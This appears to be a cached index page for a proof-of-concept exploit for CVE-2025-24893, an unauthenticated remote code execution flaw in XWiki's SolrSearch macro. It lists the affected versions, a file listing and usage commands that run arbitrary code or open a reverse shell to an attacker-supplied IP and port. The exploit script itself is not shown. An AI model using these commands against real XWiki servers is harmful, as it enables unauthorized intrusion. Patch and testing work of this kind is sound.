CVE-2025-24893 PoC — XWiki Platform 安全漏洞

Source

https://github.com/80Ottanta80/CVE-2025-24893-PoC

Associated Vulnerability

Title:XWiki Platform 安全漏洞 (CVE-2025-24893)
Description:XWiki Platform是XWiki开源的一套用于创建Web协作应用程序的Wiki平台。 XWiki Platform存在安全漏洞，该漏洞源于任何来宾用户都可以通过对SolrSearch的请求，造成远程代码执行。

Description

XWiki Unauthenticated RCE Exploit for Reverse Shell

Readme

# CVE-2025-24893-PoC

XWiki Unauthenticated RCE Exploit

## Affected XWiki Versions

- Versions < 15.10.11
- Versions < 16.4.1  
- Versions < 16.5.0RC1

## Vulnerability Description

Affected XWiki versions contain a Remote Code Execution vulnerability caused by unsafe Groovy expression handling in the SolrSearch macro. Unauthenticated attackers can execute arbitrary Groovy code remotely and obtain a reverse shell.

## Proof of Concept

This exploit can be used for executing code on the target machine and can also establishes a reverse shell. Two modes are available: interactive or parameter-based. The exploit can automatically start a listener or use an existing one.


![XWiki Interactive Output](images/image1.png)

### Prerequisites

#### Attacker Machine
- Python 3
- The exploit script
- Netcat (if not using the automatic listener)

#### Target Machine
- Vulnerable XWiki version
- Network connectivity to attacker machine

### Usage

#### Interactive Mode
```bash
python3 xwiki_groovy_rce.py
```

#### Parameter Mode
```bash
# Remote Code Execution
python3 xwiki_groovy_rce.py --code "mkdir test" -u http://example.com

# Reverse Shell with automatic listener (default)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480

# Reverse Shell without existing listener (no automatic listener)
python3 xwiki_groovy_rce.py --reverse-shell -u http://example.com -i YOUR_IP -p 4480 --no-listener
```

#### Parameters
-h/--help: Show the help menu

-u/--url: Target XWiki URL (required)

-r/--reverse-shell: Execute a reverse shell

-c/--command: Execute a single command

-i/--ip: Specify listener IP (for reverse shell only)

-p/--port: Specify listener port (for reverse shell only, default=4444)

--no-listener: Don't start a listener (for reverse shell only)

## Reference
* https://github.com/dollarboysushil/CVE-2025-24893-XWiki-Unauthenticated-RCE-Exploit-POC/tree/main
* https://nvd.nist.gov/vuln/detail/CVE-2025-24893
* https://www.offsec.com/blog/cve-2025-24893/

## Legal Disclaimer

This proof-of-concept is for educational and authorized testing purposes only. 

Unauthorized use against systems you do not own or have explicit permission to test is illegal.

The authors are not responsible for any misuse of this information.

File Snapshot


 [4.0K]  /data/pocs/b7974396cb2675d6f9c4ff82614df5f6aa15d092
├── [4.0K]  images
│   └── [112K]  image1.png
├── [2.2K]  README.md
└── [ 14K]  xwiki_groovy_rce.py

2 directories, 3 files

Shenlong Bot has cached this for you

Remarks

1. It is advised to access via the original source first.

2. If the original source is unavailable, please email f.jinxu#gmail.com for a local snapshot (replace # with @).

3. Shenlong has snapshotted the POC code for you. To support long-term maintenance, please consider donating. Thank you for your support.

Goal Reached Thanks to every supporter — we hit 100%!